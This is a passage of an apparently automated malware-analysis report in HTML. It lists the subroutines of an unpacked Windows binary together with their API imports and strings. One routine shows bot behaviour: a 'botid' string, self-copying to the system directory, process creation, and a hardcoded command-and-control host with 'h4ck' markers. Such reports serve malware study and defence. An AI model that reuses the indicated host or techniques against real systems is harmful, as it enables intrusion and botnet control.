</font></pre></td></tr><tr id="sub_4B82D2"><td><pre><a name="sub_4B82D2"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B82D2"><font size=+2>sub_4B82D2</a>(ec6f)</font>:<font color=darkgreen>
USER32.SendMessageA
USER32.SetPropA</font>
<font color=brown>
"Shutdown"
</font></pre></td></tr><tr id="sub_4087DB"><td><pre><a name="sub_4087DB"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4087DB"><font size=+2>sub_4087DB</a>(ec74)</font>:<font color=darkgreen>
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow</font>
<font color=brown>
"Window"
</font></pre></td></tr><tr id="sub_4BE283"><td><pre><a name="sub_4BE283"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4BE283"><font size=+2>sub_4BE283</a>(ed79)</font>:<font color=darkgreen>
USER32.SendMessageA
USER32.UpdateWindow
USER32.MessageBoxA
KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_40BF6F"><td><pre><a name="sub_40BF6F"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40BF6F"><font size=+2>sub_40BF6F</a>(edda)</font>:<font color=darkgreen>
KERNEL32.GetLocalTime</font>
<font color=brown>
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_4BE373"><td><pre><a name="sub_4BE373"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4BE373"><font size=+2>sub_4BE373</a>(eeac)</font>:<font color=darkgreen>
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA</font>
<font color=brown>
"-%u"
".DbgLog"
</font></pre></td></tr><tr id="sub_4B8307"><td><pre><a name="sub_4B8307"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B8307"><font size=+2>sub_4B8307</a>(ef86)</font>:<font color=darkgreen>
USER32.SendMessageA</font>
<font color=brown></font></pre></td></tr><tr id="sub_49034E"><td><pre><a name="sub_49034E"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_49034E"><font size=+2>sub_49034E</a>(f315)</font>:<font color=brown>
"1.1.4"
</font></pre></td></tr><tr id="sub_40E68B"><td><pre><a name="sub_40E68B"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40E68B"><font size=+2>sub_40E68B</a>(f463)</font>:<font color=darkgreen>
KERNEL32.GetTickCount
KERNEL32.SetErrorMode
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
WS2_32.WSAStartup
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleFileNameA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
KERNEL32.CopyFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
KERNEL32.GetCurrentProcessId
KERNEL32.OpenProcess
KERNEL32.CreateProcessA
WS2_32.WSACleanup
KERNEL32.DeleteFileA
WININET.InternetGetConnectedState</font>
<font color=brown>
"botid"
"%s%s"
"%s\\%s"
"%s %d \"%s\""
"rrxx.a1s1a.net"
"#!sx#"
"h4ck"
"rrxx.a1s1a.net"
"#!sx#"
"h4ck"
"#!sx#"
"h4ck"
</font></pre></td></tr><tr id="sub_4BDF17"><td><pre><a name="sub_4BDF17"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4BDF17"><font size=+2>sub_4BDF17</a>(fa73)</font>:<font color=darkgreen>
KERNEL32.ResumeThread
KERNEL32.Sleep
KERNEL32.SuspendThread
KERNEL32.GetThreadContext</font>
<font color=brown></font></pre></td></tr><tr id="sub_4029E0"><td><pre><a name="sub_4029E0"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4029E0"><font size=+2>sub_4029E0</a>(fae1)</font>:<font color=darkgreen>
KERNEL32.MultiByteToWideChar</font>
<font color=brown>
"\\\\"
</font></pre></td></tr><tr id="sub_40D9B2"><td><pre><a name="sub_40D9B2"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40D9B2"><font size=+2>sub_40D9B2</a>(fb40)</font>:<font color=darkgreen>
ADVAPI32.OpenSCManagerA
ADVAPI32.EnumServicesStatusA
NTDLL.RtlGetLastWin32Error
ADVAPI32.CloseServiceHandle</font>
<font color=brown>
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
</font></pre></td></tr><tr id="sub_40BEF7"><td><pre><a name="sub_40BEF7"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_40BEF7"><font size=+2>sub_40BEF7</a>(fce6)</font>:<font color=brown>
"-[Alias List]-"
"%d. %s = %s"
</font></pre></td></tr><tr id="sub_4C4F0F"><td><pre><a name="sub_4C4F0F"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4C4F0F"><font size=+2>sub_4C4F0F</a>(fced)</font>:<font color=brown>
"invalid block type"
"invalid stored block lengths"
"too many length or distance symbols"
"invalid bit length repeat"
</font></pre></td></tr><tr id="sub_4B3AFF"><td><pre><a name="sub_4B3AFF"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4B3AFF"><font size=+2>sub_4B3AFF</a>(fdf0)</font>:<font color=darkgreen>
KERNEL32.GetTickCount
USER32.PeekMessageA
USER32.TranslateMessage
USER32.DispatchMessageA
USER32.EnumWindows
USER32.IsWindow
USER32.IsWindowUnicode
KERNEL32.GlobalAlloc
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
USER32.PackDDElParam
USER32.PostMessageW
USER32.PostMessageA
KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_4CCD93"><td><pre><a name="sub_4CCD93"></a><a href="85ddc85cfce175a70f151601bbbf394f_unpacked.asm.html#sub_4CCD93"><font size=+2>sub_4CCD93</a>(ffe7)</font>:<font color=darkgreen>
KERNEL32.VirtualFree</font>
<font color=brown></font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html> |